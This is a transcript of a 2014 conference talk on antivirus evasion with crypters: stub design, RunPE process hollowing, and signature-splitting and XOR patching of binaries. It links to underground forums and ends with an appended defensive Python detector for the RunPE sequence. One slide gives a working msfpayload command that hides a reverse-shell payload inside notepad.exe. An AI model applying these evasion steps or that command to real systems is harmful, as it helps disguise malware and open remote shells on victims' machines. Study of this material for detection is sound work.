AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques
Use of Crypters
Presentation 2k14 at MundoHackerDay Congress
Kevin Mitnick was also there ;)

Published in: Technology

Transcript

  • 1. AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  • 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Consultants ! ncd:~ apasamar$ rm apasamar.cv
  • 3. what is this about... • Introduction • AV’s how they work • Malware types and AV detection • Evasion techniques • Auto-encryption, Polymorphism, Obfuscation, Compression • Crypters • types • stub • stub FUD • Modding techniques • Resources
  • 4. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> Detect MALWARE • Bad guys: Make MALWARE UNDETECTABLE
  • 5. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> MALWARE Detection • BAD GUYS: Undetect MALWARE
  • 6. introduction Bad guys objective:
  • 7. introduction Bad guys objective:
  • 8. AV howto • AntiVirus scan binaries on HARD DISK • They do not SCAN MEMORY, only the binaries that ‘start’ the running processes • Scan for signatures: binary sequences @ AV DataBase • Look for malicious techniques (Heuristics): API’s, functions, XOR, etc • Sandbox (partial execution): look for decryption routines, etc
  • 9. AV howto EXECUTABLE (DISK) —> RAM —> PROCESS ? SCAN ? AV
  • 10. AV howto • AV analysis process: Atacs
  • 11. AV howto • Recommended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov, The University of Texas at Austin
  • 12. AV howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  • 13. types of malware and AV detection • Commercial SPY Programs: (white list, signed) • e-blaster • 007 • perfect keylogger • …
  • 14. types of malware and AV detection • Newly created malware: • LOW detection (NO known signatures) • possible heuristic detections
  • 15. types of malware and AV detection • Existing Malware: (very well known, signature and heuristic detections) • trojans (BiFrost, PoisonIvy, CyberGate, SpyNet, Darkcomet) • downloaders • password stealers • reverse shells
  • 16. How can we make malware that AV already detects undetectable? • C r y p t e r s: • Software that allows you to encrypt ANY MALWARE, making it undetectable to AV.
  • 17. crypters
  • 18. builder / stub • Builder: • Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: • Its mission is to decrypt and run the ENCRYPTED MALWARE
  • 19. builder / stub CRYPTER (Builder) + STUB + DETECTED MALWARE —> (XOR, RC4, ...) —> STUB + ENCRYPTED MALWARE (as exe, dll or resource)
  • 20. builder / stub STUB | splitter | CRYPTED MALWARE | splitter | KEY A resource section can always be used
  • 21. builder / stub • Crypter types: • ScanTime • RunTime
  • 22. stub • ScanTime: STUB + CRYPTED MALWARE on HARD DISK —> DETECTED MALWARE written to HARD DISK —> AV
  • 23. stub • RunTime: STUB + ENCRYPTED MALWARE on HARD DISK —> DETECTED MALWARE only in RAM —> AV
  • 24. stub • STUB modules: • Decrypt Routine • RunPE (Dynamic Forking) Routine !
  • 25. RunPE or Dynamic Forking CreateProcess PROCESS 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP 1 +8 PROCESS 2 ReadFile WriteProcessMemory EP 2 BaseAddress 2 SetThreadContext ResumeThread
  • 26. FUD • Target: FUD Stub (Fully UnDetectable) • From Source Code • From Binary Code • How? • MODDING
  • 27. modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT, ..) • Function/string/variable replacement and obfuscation. Use of rot13 or Hex encoding • Encryption: RC4 and XOR are very well known by AV • Alternatives: TEA, DES, etc • Alternative RunPE Routines • Fake APIs • TLB (Type Library File) • Trash code
  • 28. modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
  • 29. modding binary file • We have to make the STUB undetectable; the BUILDER is only a tool used at home, not in the wild • The first step is to FIND AV SIGNATURES: • Simple Signatures • Multiple Signatures • Heuristic Signatures
  • 30. modding binary file • Recommended: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team
  • 31. modding binary file • What if we use a simple Encryption/Decryption routine inside the STUB? stub.exe: EP —> Signatures stub.exe (modified): OLD EP —> Signatures (Encrypted) NEW EP —> Decryption Routine
  • 32. modding binary file • ORIGINAL STUB MULTIPLE AV SCAN Do NOT use VirusTotal for these scans or your STUB samples will be sent to AV Companies :(
  • 33. modding binary file • ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE • .text SECTION • from offset 1050 • to Import Table
  • 34. modding binary file • ENCRYPTION ROUTINE AT NEW EP • used only to encrypt the .text section (used once) Set breakpoint here, after encryption routine
  • 35. modding binary file • DECRYPTION AND EXECUTION AT NEW EP
  • 36. modding binary file • MODIFIED STUB MULTIPLE AV SCAN 16 AV’s KO
  • 37. modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
  • 38. modding binary file • DSplit: Header + EXE body (1000 bytes) Header + EXE body (2000 bytes) Header + EXE body (3000 bytes) ··· Header + EXE body (Nx1000 bytes)
  • 39. modding binary file • AvFucker: Header + EXE body Header + 0000000000 (1000 bytes) + EXE body Header + EXE body with next 1000 bytes set to 0000000000 Header + EXE body with next 1000 bytes set to 0000000000 ··· Header + EXE body with last 1000 bytes set to 0000000000
  • 40. modding binary file • RIT Technique • Find out AV Signature • If Signature is located at instruction code —> break flow • jump to another address (hole in section where you can write your code) • Execute pending instructions • Return/jump to the appropriate instruction
  • 41. modding binary file • XOR Technique • Find out AV Signature • Apply to a byte XOR with any value i.e. 22 • Modify EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instruction
  • 42. modding binary file Detected bytes (EP): XOR of the detected bytes: New EP (XORs and jump to original EP):
  • 43. other techniques • Add Fake APIs • Hex strings edit • Move/change function calls • Change function call type: by name/by offset • Insert detected dll function into Stub Code !
  • 44. resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  • 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona (Spain) info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 ANY QUESTIONS?
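Slides 8 and 23 make the defender's problem explicit: a RunTime stub only ever exposes the decrypted payload in RAM, so a disk-only signature scan never sees it. What does remain visible is the RunPE / dynamic-forking call order from slide 25. The following is an added example, not code from the talk or from INCIDE: it matches that exact order (CreateProcess with CREATE_SUSPENDED, then GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread on the same child) in a constructed API-call trace; the trace format and the pid/flag field names are assumptions standing in for whatever an EDR or sandbox hook records.

```python
"""Flag the slide-25 RunPE sequence in an API-call trace (added example, not the talk's code)."""

CREATE_SUSPENDED = 0x00000004  # real Win32 dwCreationFlags value for CreateProcess

# Order in which the slide's RunPE routine touches the suspended child process.
RUNPE_ORDER = ["GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]


def find_runpe(trace):
    """Return {parent_pid: child_pid} for each parent that spawned a suspended child,
    rewrote it and resumed it in RUNPE_ORDER. Only the spawning pid is tracked
    (an assumption of this example; cross-process injection is not modelled)."""
    suspects = {}  # child_pid -> (parent_pid, index of next expected api)
    hits = {}
    for ev in trace:
        api, pid, args = ev["api"], ev["pid"], ev.get("args", {})
        if api == "CreateProcess" and args.get("flags", 0) & CREATE_SUSPENDED:
            suspects[args["child"]] = (pid, 0)
            continue
        target = args.get("target")
        if target not in suspects or suspects[target][0] != pid:
            continue
        parent, nxt = suspects[target]
        if api == RUNPE_ORDER[nxt]:
            nxt += 1
            if nxt == len(RUNPE_ORDER):
                hits[parent] = target  # full pattern seen: child now runs foreign code
                del suspects[target]
            else:
                suspects[target] = (parent, nxt)
        elif api == "ResumeThread":
            del suspects[target]  # resumed without the write/context steps: benign launcher
    return hits


# Constructed trace: one hollowing parent (pid 100), one benign suspended launcher (300),
# one ordinary spawn (500). Field names are this example's own convention.
CONSTRUCTED_TRACE = [
    {"pid": 100, "api": "CreateProcess", "args": {"child": 200, "flags": CREATE_SUSPENDED}},
    {"pid": 100, "api": "GetThreadContext", "args": {"target": 200}},
    {"pid": 100, "api": "ReadFile", "args": {}},
    {"pid": 100, "api": "WriteProcessMemory", "args": {"target": 200}},
    {"pid": 100, "api": "SetThreadContext", "args": {"target": 200}},
    {"pid": 100, "api": "ResumeThread", "args": {"target": 200}},
    {"pid": 300, "api": "CreateProcess", "args": {"child": 400, "flags": CREATE_SUSPENDED}},
    {"pid": 300, "api": "ResumeThread", "args": {"target": 400}},
    {"pid": 500, "api": "CreateProcess", "args": {"child": 600, "flags": 0}},
]

if __name__ == "__main__":
    print(find_runpe(CONSTRUCTED_TRACE))
```

The sequence match is deliberately strict to the slide's order; a production rule would also accept RunPE variants that unmap the child's image or skip GetThreadContext.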